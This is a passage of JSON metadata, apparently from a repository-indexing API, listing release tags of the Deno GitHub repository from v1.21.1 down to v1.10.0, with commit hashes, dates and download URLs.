1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.